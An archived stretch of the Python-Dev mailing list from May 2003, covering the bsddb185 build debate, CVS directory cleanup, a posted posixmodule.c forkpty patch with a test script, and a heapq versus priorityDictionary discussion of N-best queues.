> suspect Nick Vargish may have as well.)  My interpretation of his complaint
> is that he doesn't have a functioning bsddb module and wants the old module
> back.  

That's the larger of his complaints. There is also a subcomplaint: 
Building the new bsddb185 module is not automatic, so he has to give 
explicit instructions to his admins.

> He wants to be able to install Python and have "bsddb" be the module.

He would want it that way. However, he could also accept importing 
bsddb185 as bsddb. He cannot accept having to edit Modules/Setup,
and he cannot accept building Sleepycat [34].x

> As currently constituted, I think Modules/bsddbmodule.c can only be built as
> "bsddb185" because of the symbols in the file.  How can Nick build that as
> "bsddb"?  

He can't. He can build it as bsddb185. However, his complaint is that 
setup.py doesn't do that for him.

> Furthermore, how can you guarantee that the bsddb package
> directory won't be found before the bsddb module during a module search
> (short, perhaps of statically linking the module into the interpreter)?

I don't think the module should be bsddb; I renamed the init function on 
purpose. All I'm suggesting that it is autmatically built with setup.py.

People can accept changing their Python code. They cannot accept having 
to ask more favours from their sysadmins.

Regards,
Martin




From andymac@bullseye.apana.org.au  Fri May  2 23:45:27 2003
From: andymac@bullseye.apana.org.au (Andrew MacIntyre)
Date: Sat, 3 May 2003 09:45:27 +1100 (edt)
Subject: [Python-Dev] Re: [Pydotorg] updated notes about building bsddb185
 module
In-Reply-To: <16050.44080.588636.503705@montanaro.dyndns.org>
Message-ID: <Pine.OS2.4.44.0305030940450.136-100000@tenring.andymac.org>

On Fri, 2 May 2003, Skip Montanaro wrote:

>     Martin> Skip Montanaro wrote:
>     >> Feedback appreciated.
>
>     Martin> I think we need to build bsddb185 automatically under certain
>     Martin> conditions. I have encouraged a user to submit a patch in that
>     Martin> direction.
>
> I suppose that's an alternative, however, it is complicated by a couple
> issues:
>
>     * The bsddb185 module would have to be built as bsddb (not a big deal in
>       and of itself).
>
>     * The current bsddb package directory would have to be renamed or not
>       installed to avoid name clashes.
>
> I don't think there's a precedent for the second issue.  The make install
> target installs everything in Lib.  I think The decision about whether the
> package or the module gets installed would be made in setup.py.  The
> coupling between the two increases the complexity of the process.  I smell
> an ugly hack in the offing.

Could you not have the following?
 - build bsddb if the Sleepycat libraries are found;
 - build bsddb185 if the DB 1.85 libraries can be found;
 - where bsddb is imported, try importing bsddb, and if that
   fails try importing bsddb185 as bsddb (or as * inside the bsddb pkg).

--
Andrew I MacIntyre                     "These thoughts are mine alone..."
E-mail: andymac@bullseye.apana.org.au  | Snail: PO Box 370
        andymac@pcug.org.au            |        Belconnen  ACT  2616
Web:    http://www.andymac.org/        |        Australia



From barry@python.org  Sat May  3 03:02:45 2003
From: barry@python.org (Barry Warsaw)
Date: 02 May 2003 22:02:45 -0400
Subject: [Python-Dev] Re: [Pydotorg] updated notes about building
 bsddb185 module
In-Reply-To: <3EB30008.4010603@v.loewis.de>
References: <16050.36653.443229.45811@montanaro.dyndns.org>
 <3EB2A47F.8000706@v.loewis.de>
 <16050.44080.588636.503705@montanaro.dyndns.org>
 <3EB30008.4010603@v.loewis.de>
Message-ID: <1051927365.4302.3.camel@anthem>

On Fri, 2003-05-02 at 19:32, "Martin v. L=F6wis" wrote:

> [building bsddb185]
> > I suppose that's an alternative, however, it is complicated by a coup=
le
> > issues:
> >=20
> >     * The bsddb185 module would have to be built as bsddb (not a big =
deal in
> >       and of itself).
>=20
> Why is that? I propose to build the bsddb185 module as bsddb185. It doe=
s=20
> not support being built as bsddb[module].
>=20
> >     * The current bsddb package directory would have to be renamed or=
 not
> >       installed to avoid name clashes.
>=20
> I suggest no such thing, and I agree that this would not be desirable.

I totally agree with Martin.  Make bsddb185 explicit and do not
masquerade it as bsddb by default.

-Barry




From barry@python.org  Sat May  3 03:04:17 2003
From: barry@python.org (Barry Warsaw)
Date: 02 May 2003 22:04:17 -0400
Subject: [Python-Dev] removing csv directory from nondist/sandbox - how?
In-Reply-To: <16051.1035.821998.148196@montanaro.dyndns.org>
References: <16051.1035.821998.148196@montanaro.dyndns.org>
Message-ID: <1051927457.4302.5.camel@anthem>

On Fri, 2003-05-02 at 19:49, Skip Montanaro wrote:
> Taking a cue from Raymond's sandbox/itertools cleanup, I cvs removed the
> contents of sandbox/csv just now.  How do I get rid of the sandbox/csv
> directory itself?  I see that the itertools directory remains as well, even
> though I executed "cvs -dP ." from the sandbox directory.

Check to make sure you don't have any dot-files left in the directory. 
-P should definitely zap it if there's nothing in there.  You really
don't want to remove the directory from the repository (for a number of
reasons).

-Barry




From tim.one@comcast.net  Sat May  3 03:49:04 2003
From: tim.one@comcast.net (Tim Peters)
Date: Fri, 02 May 2003 22:49:04 -0400
Subject: [Python-Dev] New thread death in test_bsddb3
In-Reply-To: <3EB301C7.5000508@v.loewis.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEMNEEAB.tim.one@comcast.net>

[Martin v. L=F6wis]
> There are many good reasons; here is one scenario:
>
> Application A calls embedded Python. It creates thread state T1 to =
do
> so. Python calls library L1, which releases GIL. L1 calls L2. L2 ca=
lls
> back into Python. To do so, it allocates a new thread state, and
> acquires the GIL. All in one thread.
>
> L2 has no idea that A has already allocated a thread state for this
> thread. With the new API, L2 does not need any longer to create a t=
hread
> state. However, in older Python releases, this was necessary, so
> libraries do such things.

I understand that some people did this (we've bumped into two so far,
right?), but don't agree it was necessary:  the thrust of Mark's new =
code is
to make this easy to do in a uniform way, but people could (and did) =
build
their own layers of TLS-based Python wrappers before this (Mark is on=
e of
them; a former employer of mine is another).  AFAIK, though, these we=
re
cases where multiple libraries agreed to cooperate.  I don't really c=
are
anymore, since there's a standard way to do this now.

> It is unfortunate that these libraries now break, and I wish the ne=
w
> API would not be enforced so strictly yet.

If it were enforced in a release build I'd agree, but it isn't -- a r=
elease
build enforces nothing new here, and I want to be punched in the groi=
n when
a debug build spots dubious practice.

>> I already gave you my best guesses about those (no, yes).

> I think your guess is wrong: In the past, it was often *necessary* =
to
> have multiple thread states allocated for a single thread. There wa=
s
> simply no other option. So it can't be that this was not allowed.

It's a new world now -- let's get on with it.  Fighting for the right=
 to
retain lame code (judged by current stds, whether or not it was lame =
before)
isn't a cause I'll sign up for, and especially not when it's in an ex=
tremely
error-prone area of the C API, and certainly not when it's so easy to=
 repair
too.  But if you're determined to let slop slide in the debug build, =
check
in a change to stop the warning -- it's not important enough to me to=
 keep
arguing about it.  I don't think you'd be doing anyone a real favor, =
and
I'll leave it at that.




From martin@v.loewis.de  Sat May  3 02:52:41 2003
From: martin@v.loewis.de (=?ISO-8859-1?Q?=22Martin_v=2E_L=F6wis=22?=)
Date: Sat, 03 May 2003 03:52:41 +0200
Subject: [Python-Dev] Re: [Pydotorg] updated notes about building bsddb185
 module
In-Reply-To: <Pine.OS2.4.44.0305030940450.136-100000@tenring.andymac.org>
References: <Pine.OS2.4.44.0305030940450.136-100000@tenring.andymac.org>
Message-ID: <3EB320E9.4020409@v.loewis.de>

Andrew MacIntyre wrote:

> Could you not have the following?
>  - build bsddb if the Sleepycat libraries are found;

That is happening now.

>  - build bsddb185 if the DB 1.85 libraries can be found;

That is what I'm proposing. Volunteers should step forward.

>  - where bsddb is imported, try importing bsddb, and if that
>    fails try importing bsddb185 as bsddb (or as * inside the bsddb pkg).

I'm strongly opposed to that. Users of bsddb185 need to
make an explicit choice that they want to use that library. Otherwise,
we would have to deal with the bug reports resulting from the brokenness 
of the library forever.

Regards,
Martin




From tim.one@comcast.net  Sat May  3 04:16:35 2003
From: tim.one@comcast.net (Tim Peters)
Date: Fri, 02 May 2003 23:16:35 -0400
Subject: [Python-Dev] removing csv directory from nondist/sandbox - how?
In-Reply-To: <16051.1035.821998.148196@montanaro.dyndns.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEMPEEAB.tim.one@comcast.net>

[Skip Montanaro]
> Taking a cue from Raymond's sandbox/itertools cleanup, I cvs removed
> the contents of sandbox/csv just now.  How do I get rid of the
> sandbox/csv directory itself?  I see that the itertools directory
> remains as well, even though I executed "cvs -dP ." from the sandbox
> directory.

-P won't remove a directory if there's any file remaining in the directory
that wasn't checked in.  This includes dot files (as Barry said), .rej files
left behind by old rejected patches, temp scripts or output files you may
have created, or a build directory created by setup.py.  I had to get rid of
all of those before CVS deleted my csv directory (normally I just do deltree
(rm -rf) on a dead directory, and CVS won't recreate it then, but I did it
by hand this time just to verify how -P works).



From noah@noah.org  Sat May  3 11:36:53 2003
From: noah@noah.org (Noah Spurrier)
Date: Sat, 03 May 2003 03:36:53 -0700
Subject: [Python-Dev] posixmodule.c patch to support forkpty (patch against posixmodule.c
 Revision 2.241.2.1)
Message-ID: <3EB39BC5.50702@noah.org>

This is a multi-part message in MIME format.
--------------020003030503000503080704
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hi,

I have been taking a hard look at Python 2.3b and support for
pseudo-ttys seems to be much better. It looks like os.openpty() was
updated to provide support for a wider range of pseudo ttys.
Unfortunately os.forkpty() was not also updated.

I am attaching a patch that allows os.forkpty() to run on the
same platforms that os.openpty supports. In other words, os.forkpty()
will use os.fork() and os.openpty() for platforms that don't
already have forkpty(). Note that since pty module calls os.forkpty
this patch will also allow pty.fork() to work properly on more platforms.
Most importantly to me, this patch will allow os.forkpty()
to work with Solaris.

This patch was diffed against posixmodule.c Revision 2.241.2.1 Python 2.3b.

This patch moves most of the logic out of the posix_openpty() C function into
a function that can be shared by both posix_openpty() and posix_forkpty().
Although the posix_openpty() logic was moved it was unchanged. I think I
kept the code neat despite all the messy #if's that always accompany pty code.

I am also attaching a test script, test_forkpty.py (based on test_openpty.py),
that tests the basic ability to fork and read and write a pty.

I am testing it with my Pexpect module which makes heavy use of
the pty module. With the patch Pexpect passes all my unit tests on Solaris.
Pexpect has been tested on Linux, OpenBSD, Solaris, and Cygwin.
I'm looking for an OS X server to test with.

Yours,
Noah

--------------020003030503000503080704
Content-Type: text/plain;
 name="test_forkpty.py"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="test_forkpty.py"

#!/usr/bin/env python2.3

import os, sys, time
verbose = 1

try:
    if verbose:
        print "Calling os.forkpty()"
    pid, fd = os.forkpty()
    if verbose:
        print "(pid, fd) = (%d, %d)"%(pid, fd)
except AttributeError:
    raise TestSkipped, "No forkpty() available."

if pid == 0: # child
        print "I am not a robot!"
        sys.stdout.flush(0)
else:
        time.sleep(1)
        print "The robot says: ", os.read(fd,100)
        os.close(fd)

--------------020003030503000503080704
Content-Type: text/plain;
 name="posixmodule.c.patch"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="posixmodule.c.patch"

*** posixmodule.c	Tue Apr 22 22:39:17 2003
--- new.posixmodule.c	Sat May  3 06:11:04 2003
***************
*** 2597,2685 ****
  #endif /* defined(HAVE_OPENPTY) || defined(HAVE_FORKPTY) || defined(HAVE_DEV_PTMX */
  
  #if defined(HAVE_OPENPTY) || defined(HAVE__GETPTY) || defined(HAVE_DEV_PTMX)
- PyDoc_STRVAR(posix_openpty__doc__,
- "openpty() -> (master_fd, slave_fd)\n\n\
- Open a pseudo-terminal, returning open fd's for both master and slave end.\n");
- 
  static PyObject *
! posix_openpty(PyObject *self, PyObject *noargs)
  {
! 	int master_fd, slave_fd;
  #ifndef HAVE_OPENPTY
! 	char * slave_name;
  #endif
  #if defined(HAVE_DEV_PTMX) && !defined(HAVE_OPENPTY) && !defined(HAVE__GETPTY)
! 	PyOS_sighandler_t sig_saved;
  #ifdef sun
! 	extern char *ptsname();
  #endif
  #endif
  
  #ifdef HAVE_OPENPTY
! 	if (openpty(&master_fd, &slave_fd, NULL, NULL, NULL) != 0)
! 		return posix_error();
  #elif defined(HAVE__GETPTY)
! 	slave_name = _getpty(&master_fd, O_RDWR, 0666, 0);
! 	if (slave_name == NULL)
! 		return posix_error();
  
! 	slave_fd = open(slave_name, O_RDWR);
! 	if (slave_fd < 0)
! 		return posix_error();
  #else
! 	master_fd = open(DEV_PTY_FILE, O_RDWR | O_NOCTTY); /* open master */
! 	if (master_fd < 0)
! 		return posix_error();
! 	sig_saved = signal(SIGCHLD, SIG_DFL);
! 	/* change permission of slave */
! 	if (grantpt(master_fd) < 0) {
! 		signal(SIGCHLD, sig_saved);
! 		return posix_error();
! 	}
! 	/* unlock slave */
! 	if (unlockpt(master_fd) < 0) {
! 		signal(SIGCHLD, sig_saved);
! 		return posix_error();
! 	}
! 	signal(SIGCHLD, sig_saved);
! 	slave_name = ptsname(master_fd); /* get name of slave */
! 	if (slave_name == NULL)
! 		return posix_error();
! 	slave_fd = open(slave_name, O_RDWR | O_NOCTTY); /* open slave */
! 	if (slave_fd < 0)
! 		return posix_error();
  #if !defined(__CYGWIN__) && !defined(HAVE_DEV_PTC)
! 	ioctl(slave_fd, I_PUSH, "ptem"); /* push ptem */
! 	ioctl(slave_fd, I_PUSH, "ldterm"); /* push ldterm */
  #ifndef __hpux
! 	ioctl(slave_fd, I_PUSH, "ttcompat"); /* push ttcompat */
  #endif /* __hpux */
  #endif /* HAVE_CYGWIN */
  #endif /* HAVE_OPENPTY */
  
! 	return Py_BuildValue("(ii)", master_fd, slave_fd);
  
  }
  #endif /* defined(HAVE_OPENPTY) || defined(HAVE__GETPTY) || defined(HAVE_DEV_PTMX) */
  
! #ifdef HAVE_FORKPTY
  PyDoc_STRVAR(posix_forkpty__doc__,
  "forkpty() -> (pid, master_fd)\n\n\
  Fork a new process with a new pseudo-terminal as controlling tty.\n\n\
  Like fork(), return 0 as pid to child process, and PID of child to parent.\n\
  To both, return fd of newly opened pseudo-terminal.\n");
- 
  static PyObject *
  posix_forkpty(PyObject *self, PyObject *noargs)
  {
! 	int master_fd, pid;
  
! 	pid = forkpty(&master_fd, NULL, NULL, NULL);
! 	if (pid == -1)
! 		return posix_error();
! 	if (pid == 0)
! 		PyOS_AfterFork();
! 	return Py_BuildValue("(ii)", pid, master_fd);
  }
  #endif
  
--- 2597,2784 ----
  #endif /* defined(HAVE_OPENPTY) || defined(HAVE_FORKPTY) || defined(HAVE_DEV_PTMX */
  
  #if defined(HAVE_OPENPTY) || defined(HAVE__GETPTY) || defined(HAVE_DEV_PTMX)
  static PyObject *
! __shared_openpty (int * out_master_fd, int * out_slave_fd)
  {
!     int master_fd, slave_fd;
  #ifndef HAVE_OPENPTY
!     char * slave_name;
  #endif
  #if defined(HAVE_DEV_PTMX) && !defined(HAVE_OPENPTY) && !defined(HAVE__GETPTY)
!     PyOS_sighandler_t sig_saved;
  #ifdef sun
!     extern char *ptsname();
  #endif
  #endif
  
  #ifdef HAVE_OPENPTY
!     if (openpty(&master_fd, &slave_fd, NULL, NULL, NULL) != 0)
!         return posix_error();
  #elif defined(HAVE__GETPTY)
!     slave_name = _getpty(&master_fd, O_RDWR, 0666, 0);
!     if (slave_name == NULL)
!         return posix_error();
  
!     slave_fd = open(slave_name, O_RDWR);
!     if (slave_fd < 0)
!         return posix_error();
  #else
!     master_fd = open(DEV_PTY_FILE, O_RDWR | O_NOCTTY);
!     if (master_fd < 0){
!         return posix_error();
!     }
!     sig_saved = signal(SIGCHLD, SIG_DFL);
!     /* change permission of slave */
!     if (grantpt(master_fd) < 0) {
!         signal(SIGCHLD, sig_saved);
!         return posix_error();
!     }
!     /* unlock slave */
!     if (unlockpt(master_fd) < 0) {
!         signal(SIGCHLD, sig_saved);
!         return posix_error();
!     }
!     signal(SIGCHLD, sig_saved);
!     slave_name = ptsname(master_fd);
!     if (slave_name == NULL){
!         return posix_error();
!     }
!     slave_fd = open(slave_name, O_RDWR | O_NOCTTY);
!     if (slave_fd < 0){
!         return posix_error();
!     }
  #if !defined(__CYGWIN__) && !defined(HAVE_DEV_PTC)
!     ioctl(slave_fd, I_PUSH, "ptem"); /* push ptem */
!     ioctl(slave_fd, I_PUSH, "ldterm"); /* push ldterm */
  #ifndef __hpux
!     ioctl(slave_fd, I_PUSH, "ttcompat"); /* push ttcompat */
  #endif /* __hpux */
  #endif /* HAVE_CYGWIN */
  #endif /* HAVE_OPENPTY */
  
!     *out_master_fd = master_fd;
!     *out_slave_fd = slave_fd;
!     return Py_BuildValue("(ii)", master_fd, slave_fd);
! }
  
+ PyDoc_STRVAR(posix_openpty__doc__,
+ "openpty() -> (master_fd, slave_fd)\n\n\
+ Open a pseudo-terminal, returning open fd's for both master and slave end.\n");
+ static PyObject *
+ posix_openpty(PyObject *self, PyObject *noargs)
+ {
+     int master_fd;
+     int slave_fd;
+ 
+     return __shared_openpty (& master_fd, & slave_fd);
  }
  #endif /* defined(HAVE_OPENPTY) || defined(HAVE__GETPTY) || defined(HAVE_DEV_PTMX) */
  
! /* Use forkpty if available. For platform that don't have it I try to define it. */
! #if defined(HAVE_FORKPTY) || (defined(HAVE_FORK) && (defined(HAVE_OPENPTY) || defined(HAVE__GETPTY) || defined(HAVE_DEV_PTMX)))
  PyDoc_STRVAR(posix_forkpty__doc__,
  "forkpty() -> (pid, master_fd)\n\n\
  Fork a new process with a new pseudo-terminal as controlling tty.\n\n\
  Like fork(), return 0 as pid to child process, and PID of child to parent.\n\
  To both, return fd of newly opened pseudo-terminal.\n");
  static PyObject *
  posix_forkpty(PyObject *self, PyObject *noargs)
  {
! #ifdef HAVE_FORKPTY        /* The easy one */
!     int master_fd, pid;
!     pid = forkpty(&master_fd, NULL, NULL, NULL);
! #else                    /* The hard one */
!     int master_fd, pid;
!     int slave_fd;
!     char * slave_name;
!     int fd;
! 
!     __shared_openpty (& master_fd, & slave_fd);
!     if (master_fd < 0 || slave_fd < 0)
!     {
!         return posix_error();
!     }
!     slave_name = ptsname(master_fd);
  
!     pid = fork();
!     switch (pid) {
!     case -1:
!             return posix_error();
!     case 0: /* Child */
! 
! #ifdef TIOCNOTTY
!         /* Explicitly close the old controlling terminal.
!         Some platforms require an explicit detach of the current controlling tty
!         before we close stdin, stdout, stderr.
!         OpenBSD says that this is obsolete, but doesn't hurt. */
!         fd = open("/dev/tty", O_RDWR | O_NOCTTY);
!         if (fd >= 0) {
!             (void) ioctl(fd, TIOCNOTTY, (char *)0);
!             close(fd);
!         }
! #endif /* TIOCNOTTY */
! 
!         /* The setsid() system call will place the process into its own session
!             which has the effect of disassociating it from the controlling terminal.
!             This is known to be true for OpenBSD.
!          */
!         if (setsid() < 0){
!             return posix_error();
!         }
! 
! 
!         /* Verify that we are disconnected from the controlling tty. */
!         fd = open("/dev/tty", O_RDWR | O_NOCTTY);
!         if (fd >= 0) {
!             close(fd);
!             return posix_error();
!         }
! 
! #ifdef TIOCSCTTY
!         /* Make the pseudo terminal the controlling terminal for this process
!          (the process must not currently have a controlling terminal).
!         */
!         if (ioctl(slave_fd, TIOCSCTTY, (char *)0) < 0){
!             return posix_error();
!         }
! #endif /* TIOCSCTTY */
! 
!         /* Verify that we can open to the slave pty file. */
!         fd = open(slave_name, O_RDWR);
!         if (fd < 0){
!             return posix_error();
!         }
!         else
!             close(fd);
! 
!         /* Verify that we now have a controlling tty. */
!         fd = open("/dev/tty", O_WRONLY);
!         if (fd < 0){
!             return posix_error();
!         }
!         else {
!             close(fd);
!         }
! 
!         (void) close(master_fd);
!         (void) dup2(slave_fd, 0);
!         (void) dup2(slave_fd, 1);
!         (void) dup2(slave_fd, 2);
!         if (slave_fd > 2)
!             (void) close(slave_fd);
!         pid = 0;
!         break;
!     default:
!         /* PARENT */
!         (void) close(slave_fd);
!     }
! #endif
! 
!     if (pid == -1)
!         return posix_error();
!     if (pid == 0)
!         PyOS_AfterFork();
!     return Py_BuildValue("(ii)", pid, master_fd);
  }
  #endif
  
***************
*** 6994,7000 ****
  #if defined(HAVE_OPENPTY) || defined(HAVE__GETPTY) || defined(HAVE_DEV_PTMX)
  	{"openpty",	posix_openpty, METH_NOARGS, posix_openpty__doc__},
  #endif /* HAVE_OPENPTY || HAVE__GETPTY || HAVE_DEV_PTMX */
! #ifdef HAVE_FORKPTY
  	{"forkpty",	posix_forkpty, METH_NOARGS, posix_forkpty__doc__},
  #endif /* HAVE_FORKPTY */
  #ifdef HAVE_GETEGID
--- 7093,7099 ----
  #if defined(HAVE_OPENPTY) || defined(HAVE__GETPTY) || defined(HAVE_DEV_PTMX)
  	{"openpty",	posix_openpty, METH_NOARGS, posix_openpty__doc__},
  #endif /* HAVE_OPENPTY || HAVE__GETPTY || HAVE_DEV_PTMX */
! #if defined(HAVE_FORKPTY) || (defined(HAVE_FORK) && (defined(HAVE_OPENPTY) || defined(HAVE__GETPTY) || defined(HAVE_DEV_PTMX)))
  	{"forkpty",	posix_forkpty, METH_NOARGS, posix_forkpty__doc__},
  #endif /* HAVE_FORKPTY */
  #ifdef HAVE_GETEGID

--------------020003030503000503080704--



From martin@v.loewis.de  Sat May  3 13:23:09 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 03 May 2003 14:23:09 +0200
Subject: [Python-Dev] posixmodule.c patch to support forkpty (patch against posixmodule.c Revision 2.241.2.1)
In-Reply-To: <3EB39BC5.50702@noah.org>
References: <3EB39BC5.50702@noah.org>
Message-ID: <m3he8cb4nm.fsf@mira.informatik.hu-berlin.de>

Noah Spurrier <noah@noah.org> writes:

> I am attaching a patch 

Please see

http://www.python.org/dev/devfaq.html#a2

Please don't post patches to python-dev.

> This patch was diffed against posixmodule.c Revision 2.241.2.1 Python 2.3b.

Please generate patches against the mainline, not against branches.

Kind regards,
Martin


From noah@noah.org  Sat May  3 15:10:12 2003
From: noah@noah.org (Noah Spurrier)
Date: Sat, 03 May 2003 07:10:12 -0700
Subject: [Python-Dev] posixmodule.c patch to support forkpty (patch against
 posixmodule.c Revision 2.241.2.1)
In-Reply-To: <m3he8cb4nm.fsf@mira.informatik.hu-berlin.de>
References: <3EB39BC5.50702@noah.org> <m3he8cb4nm.fsf@mira.informatik.hu-berlin.de>
Message-ID: <3EB3CDC4.4020306@noah.org>

Sorry... my first patch :-)

Yours,
Noah

Martin v. L=F6wis wrote:
> Noah Spurrier <noah@noah.org> writes:
>=20
>>I am attaching a patch=20
>=20
> Please see
>=20
> http://www.python.org/dev/devfaq.html#a2




From skip@pobox.com  Sat May  3 15:22:48 2003
From: skip@pobox.com (Skip Montanaro)
Date: Sat, 3 May 2003 09:22:48 -0500
Subject: [Python-Dev] Re: [Pydotorg] updated notes about building
 bsddb185 module
In-Reply-To: <1051927365.4302.3.camel@anthem>
References: <16050.36653.443229.45811@montanaro.dyndns.org>
 <3EB2A47F.8000706@v.loewis.de>
 <16050.44080.588636.503705@montanaro.dyndns.org>
 <3EB30008.4010603@v.loewis.de>
 <1051927365.4302.3.camel@anthem>
Message-ID: <16051.53432.301308.205335@montanaro.dyndns.org>

    Barry> I totally agree with Martin.  Make bsddb185 explicit and do not
    Barry> masquerade it as bsddb by default.

Okay, that's fine with me.

Skip




From skip@pobox.com  Sat May  3 15:25:28 2003
From: skip@pobox.com (Skip Montanaro)
Date: Sat, 3 May 2003 09:25:28 -0500
Subject: [Python-Dev] Re: [Pydotorg] updated notes about building
 bsddb185 module
In-Reply-To: <1051927365.4302.3.camel@anthem>
References: <16050.36653.443229.45811@montanaro.dyndns.org>
 <3EB2A47F.8000706@v.loewis.de>
 <16050.44080.588636.503705@montanaro.dyndns.org>
 <3EB30008.4010603@v.loewis.de>
 <1051927365.4302.3.camel@anthem>
Message-ID: <16051.53592.704262.929675@montanaro.dyndns.org>

    Barry> I totally agree with Martin.  Make bsddb185 explicit and do not
    Barry> masquerade it as bsddb by default.

    Skip> Okay, that's fine with me.

How about

    http://python.org/sf/727137

then?  I think dbhash should consider bsddb185 as a possibility.  That would
make Nick Vargish's anydbm programs keep running I think.

Skip



From skip@pobox.com  Sat May  3 15:28:52 2003
From: skip@pobox.com (Skip Montanaro)
Date: Sat, 3 May 2003 09:28:52 -0500
Subject: [Python-Dev] Re: [Pydotorg] updated notes about building bsddb185
 module
In-Reply-To: <3EB320E9.4020409@v.loewis.de>
References: <Pine.OS2.4.44.0305030940450.136-100000@tenring.andymac.org>
 <3EB320E9.4020409@v.loewis.de>
Message-ID: <16051.53796.553202.289905@montanaro.dyndns.org>

    >> - where bsddb is imported, try importing bsddb, and if that
    >> fails try importing bsddb185 as bsddb (or as * inside the bsddb pkg).

    Martin> I'm strongly opposed to that. Users of bsddb185 need to make an
    Martin> explicit choice that they want to use that library. Otherwise,
    Martin> we would have to deal with the bug reports resulting from the
    Martin> brokenness of the library forever.

Yeah, but there are places in the core library (like anydbm via dbhash)
which import bsddb and are generally going to be out of control of end
users.  I think those places need to consider bsddb185 as a possibility.  I
already posted a link to a SF patch.

Skip



From dave@boost-consulting.com  Sat May  3 17:45:10 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Sat, 03 May 2003 12:45:10 -0400
Subject: [Python-Dev] Timbot?
Message-ID: <uisssj7xl.fsf@boost-consulting.com>

This has probably already been spotted, but in case it hasn't...

I just googled for Timbot and found:

  http://www.cse.ogi.edu/~mpj/timbot/#Programming


-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com



From gward@python.net  Sat May  3 20:21:31 2003
From: gward@python.net (Greg Ward)
Date: Sat, 3 May 2003 15:21:31 -0400
Subject: [Python-Dev] optparse docs need proofreading
Message-ID: <20030503192131.GA4689@cthulhu.gerg.ca>

So you're sitting around, wondering what to do with your weekend, and
worrying that the Python 2.3 documentation is not perfect yet.  Well,
you could proofread the documentation for optparse (currently section
6.20 of the "lib" manual), which was converted wholesale from
reStructuredText to LaTeX, and still bears some scars.  Both the
DVI/PS/PDF output and HTML bear close examination.

I'm working on it now, but will undoubtedly miss stuff, so feel free to
email any glitches you notice in the latest CVS version to me.

        Greg
-- 
Greg Ward <gward@python.net>                         http://www.gerg.ca/


From tim.one@comcast.net  Sun May  4 06:26:09 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sun, 04 May 2003 01:26:09 -0400
Subject: [Python-Dev] Re: heaps
In-Reply-To: <5841710.1051745776@[10.0.1.2]>
Message-ID: <LNBBLJKPBEHFEDALKOLCEENNEEAB.tim.one@comcast.net>

[Tim]
>> ...
>> priorityDictionary looks like an especially nice API for this specific
>> algorithm, but, e.g., impossible to use directly for maintaining an N-
>> best queue (priorityDictionary doesn't support multiple values with
>> the same priority, right?

That was wrong:  the dict maps items to priorities, and I read it backwards.
Sorry!

>> if we're trying to find the 10,000 poorest people in America, counting
>> only one as dead broke would be too Republican for some peoples' tastes
>> <wink>).  OTOH, heapq is easy and efficient for *that* class of heap
>> application.

[David Eppstein]
> I agree with your main points (heapq's inability to handle
> certain priority  queue applications doesn't mean it's useless, and
> its implementation-specific API helps avoid fooling programmers into
> thinking it's any more than what it is).  But I am confused at this
> example.  Surely it's just as easy to store (income,identity) tuples in
> either data structure.

As above, I was inside out.

"Just as easy" can't be answered without trying to write actual code,
though.  Given that heapq and priorityDictionary are both min-heaps, to
avoid artificial pain let's look for the people with the N highest incomes
instead.

For an N-best queue using heapq, "the natural" thing is to define people
like so:

class Person:
    def __init__(self, income):
        self.income = income

    def __cmp__(self, other):
        return cmp(self.income, other.income)

and then the N-best calculation is as follows; it's normal in N-best
applications that N is much smaller than the number of items being ranked,
and you don't want to consume more than O(N) memory (for example, google
wants to show you the best-scoring 25 documents of the 6 million matches it
found):

"""
# N-best queue for people with the N largest incomes.
import heapq

dummy = Person(-1)  # effectively an income of -Inf
q = [dummy] * N     # it's fine to use the same object N times

for person in people:
    if person > q[0]:
        heapq.heapreplace(q, person)

# The result list isn't sorted.
result = [person for person in q if q is not dummy]
"""

I'm not as experienced with priorityDictionary.  For heapq, the natural
__cmp__ is the one that compares objects' priorities.  For
priorityDictionary, we can't use that, because Person instances will be used
as dict keys, and then two Persons with the same income couldn't be in the
queue at the same time.  So Person.__cmp__ will have to change in such a way
that distinct Persons never compare equal.  I also have to make sure that a
Person is hashable.  I see there's another subtlety, apparent only from
reading the implementation code:  in the heap maintained alongside the dict,
it's actually

    (priority, object)

tuples that get compared.  Since I expect to see Persons with equal income,
when two such tuples get compared, they'll tie on the priority, and go on to
compare the Persons.  So I have to be sure too that comparing two Persons is
cheap.

Pondering all that for a while, it seems best to make sure Person doesn't
define __cmp__ or __hash__ at all.  Then instances will get compared by
memory address, distinct Persons will never compare equal, comparing Persons
is cheap, and hashing by memory address is cheap too:

class Person:
    def __init__(self, income):
        self.income = income

The N-best code is then:

"""
q = priorityDictionary()

for dummy in xrange(N):
    q[Person(-1)] = -1   # have to ensure these are distinct Persons

for person in people:
    if person.income > q.smallest().income:
        del q[q.smallest()]
        q[person] = person.income

# The result list is sorted.
result = [person for person in q if person.income != -1]
"""

Perhaps paradoxically, I had to know essentially everything about how
priorityDictionary is implemented to write a correct and efficient algorithm
here.  That was true of heapq too, of course, but there were fewer
subtleties to trip over there, and heapq isn't trying to hide its
implementation.

BTW, there's a good use of heapq for you:  you could use it to maintain the
under-the-covers heap inside priorityDictionary!  It would save much of the
code, and possibly speed it too (heapq's implementation of popping usually
requires substantially fewer comparisons than priorityDictionary.smallest
uses; this is explained briefly in the comments before _siftup, deferring to
Knuth for the gory details).

> If you mean, you want to find the 10k smallest income values (rather than
> the people having those incomes), then it may be that a better data
> structure would be a simple list L in which the value of L[i] is
> the count of people with income i.

Well, leaving pennies out of it, incomes in the USA span 9 digits, so
something taking O(N) memory would still be most attractive.



From eppstein@ics.uci.edu  Sun May  4 06:46:58 2003
From: eppstein@ics.uci.edu (David Eppstein)
Date: Sat, 03 May 2003 22:46:58 -0700
Subject: [Python-Dev] Re: heaps
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEENNEEAB.tim.one@comcast.net>
References: <LNBBLJKPBEHFEDALKOLCEENNEEAB.tim.one@comcast.net>
Message-ID: <17342817.1052002018@[10.0.1.2]>

On 5/4/03 1:26 AM -0400 Tim Peters <tim.one@comcast.net> wrote:
> it's normal in N-best applications that N is much smaller than the number
> of items being ranked, and you don't want to consume more than O(N)
> memory (for example, google wants to show you the best-scoring 25
